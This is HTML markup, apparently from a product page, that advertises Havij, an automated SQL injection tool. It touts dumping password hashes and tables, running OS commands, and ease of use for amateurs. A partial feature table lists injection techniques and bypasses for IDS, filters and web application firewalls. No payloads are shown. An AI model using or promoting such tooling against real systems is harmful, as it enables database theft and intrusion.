&lt;P style=&quot;LINE-HEIGHT: normal; MARGIN: 0in 0in 0pt; BORDER-COLLAPSE: collapse; FONT-FAMILY: '맑은 고딕'; COLOR: rgb(0,0,0); FONT-SIZE: medium; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px&quot; class=MsoNormal align=justify&gt;&lt;SPAN style=&quot;FONT-FAMILY: Calibri&quot;&gt;&lt;o:p&gt;&lt;FONT color=#330000&gt;&lt;FONT color=#330000 size=2 face=&quot;Arial, Helvetica, sans-serif&quot;&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;LINE-HEIGHT: normal; MARGIN: 0in 0in 0pt; BORDER-COLLAPSE: collapse; FONT-FAMILY: '맑은 고딕'; COLOR: rgb(0,0,0); FONT-SIZE: medium; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px&quot; class=MsoNormal align=justify&gt;&lt;SPAN style=&quot;FONT-FAMILY: Calibri&quot;&gt;&lt;FONT color=#330000&gt;&lt;FONT color=#330000&gt;&lt;FONT face=&quot;Arial, Helvetica, sans-serif&quot;&gt;&lt;FONT size=2&gt;It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and&amp;nbsp;&lt;SPAN&gt;&amp;nbsp;&lt;/SPAN&gt;password hashes, dump tables and columns, fetching data from the database, running SQL&amp;nbsp;&lt;SPAN&gt;&amp;nbsp;&lt;/SPAN&gt;statements and even accessing the underlying file system and executing commands on the&amp;nbsp;&lt;SPAN&gt;&amp;nbsp;&lt;/SPAN&gt;operating system.&lt;o:p&gt;&lt;/o:p&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;LINE-HEIGHT: normal; MARGIN: 0in 0in 0pt; BORDER-COLLAPSE: collapse; FONT-FAMILY: '맑은 고딕'; COLOR: rgb(0,0,0); FONT-SIZE: medium; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px&quot; class=MsoNormal align=justify&gt;&lt;SPAN style=&quot;FONT-FAMILY: Calibri&quot;&gt;&lt;o:p&gt;&lt;FONT color=#330000&gt;&lt;FONT color=#330000 size=2 face=&quot;Arial, Helvetica, sans-serif&quot;&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;LINE-HEIGHT: normal; MARGIN: 0in 0in 0pt; BORDER-COLLAPSE: collapse; FONT-FAMILY: '맑은 고딕'; COLOR: rgb(0,0,0); FONT-SIZE: medium; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px&quot; class=MsoNormal align=justify&gt;&lt;SPAN style=&quot;FONT-FAMILY: Calibri&quot;&gt;&lt;FONT color=#330000&gt;&lt;FONT color=#330000&gt;&lt;FONT face=&quot;Arial, Helvetica, sans-serif&quot;&gt;&lt;FONT size=2&gt;The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.&lt;o:p&gt;&lt;/o:p&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;LINE-HEIGHT: normal; MARGIN: 0in 0in 0pt; BORDER-COLLAPSE: collapse; FONT-FAMILY: '맑은 고딕'; COLOR: rgb(0,0,0); FONT-SIZE: medium; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px&quot; class=MsoNormal align=justify&gt;&lt;SPAN style=&quot;FONT-FAMILY: Calibri&quot;&gt;&lt;o:p&gt;&lt;FONT color=#330000&gt;&lt;FONT color=#330000 size=2 face=&quot;Arial, Helvetica, sans-serif&quot;&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;LINE-HEIGHT: normal; MARGIN: 0in 0in 0pt; BORDER-COLLAPSE: collapse; FONT-FAMILY: '맑은 고딕'; COLOR: rgb(0,0,0); FONT-SIZE: medium; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px&quot; class=MsoNormal align=justify&gt;&lt;SPAN style=&quot;FONT-FAMILY: Calibri&quot;&gt;&lt;FONT color=#330000&gt;&lt;FONT color=#330000&gt;&lt;FONT face=&quot;Arial, Helvetica, sans-serif&quot;&gt;&lt;FONT size=2&gt;The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: '맑은 고딕'; COLOR: rgb(0,0,0); FONT-SIZE: medium&quot; class=Apple-style-span&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in 0in 0pt&quot; class=MsoNormal&gt;&lt;FONT color=#330000&gt;&lt;FONT color=#330000&gt;&lt;FONT face=&quot;Arial, Helvetica, sans-serif&quot;&gt;&lt;FONT size=2&gt;&lt;SPAN style=&quot;FONT-FAMILY: Calibri&quot;&gt;&lt;FONT color=#330000&gt;&lt;FONT color=#000000&gt;&lt;FONT face=&quot;Arial, Helvetica, sans-serif&quot;&gt;&lt;FONT size=2&gt;&lt;STRONG&gt;Features&lt;/STRONG&gt;:&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;FONT color=#330000&gt;&lt;FONT color=#330000&gt;&lt;FONT face=&quot;Arial, Helvetica, sans-serif&quot;&gt;&lt;FONT size=2&gt;
&lt;P style=&quot;MARGIN: 0in 0in 0pt&quot; class=MsoNormal&gt;&lt;SPAN style=&quot;FONT-FAMILY: Calibri&quot;&gt;&lt;FONT size=2 face=Arial&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&amp;nbsp;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in 0in 0pt&quot; class=MsoNormal&gt;&lt;/P&gt;
&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; id=table1 border=1 borderColor=#969696 width=600 align=center&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD bgColor=#d5ced7 width=450&gt;
&lt;P align=center&gt;&lt;FONT size=1 face=Verdana&gt;&lt;STRONG&gt;Items&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
&lt;TD bgColor=#d5ced7 width=75 align=middle&gt;&lt;FONT size=1 face=Verdana&gt;&lt;STRONG&gt;Free version&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#d5ced7 width=75 align=middle&gt;&lt;FONT size=1 face=Verdana&gt;&lt;STRONG&gt;Commercial version&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;1. Supported Databases with injection methods:&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&amp;nbsp;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; MsSQL 2000/2005 with error&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; MsSQL 2000/2005 no error union based&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; MsSQL Blind&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; MySQL time based&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; MySQL union based&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; MySQL Blind&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; MySQL error based&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; MySQL time based&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Oracle union based&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Oracle error based&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; PostgreSQL union based&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; MsAccess union based&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; MsAccess Blind&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Sybase (ASE)&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/FONT&gt;&lt;FONT size=2 face=Verdana&gt;Sybase (ASE)&amp;nbsp;&lt;/FONT&gt;&lt;FONT size=2 face=Verdana&gt;Blind&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;2. HTTPS Support&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;3. Proxy support&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;4. Automatic database detection&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;5. Automatic type detection (string or integer)&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;6. Automatic keyword detection (finding difference between the positive and negative response)&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;7. Trying different injection syntaxes&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;8. Options for replacing space by /**/,+,... against IDS or filters&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;9. Avoid using strings (magic_quotes similar filters bypass)&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;10. Manual injection syntax support&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;11. Manual queries with result&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;12. Bypassing illegal union&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;13. Full customizable http headers (like referer,user agent and ...)&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;14. Load cookie from site for authentication&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;15. Http Basic and Digest authentication&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;16. Injecting URL rewrite pages&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;17. Bypassing mod_security web application firewall and similar firewalls&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;18. Real time result&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;19. Guessing tables and columns in mysql&amp;lt;5 (also in blind) and MsAccess&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;20. Fast getting tables and columns for mysql&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
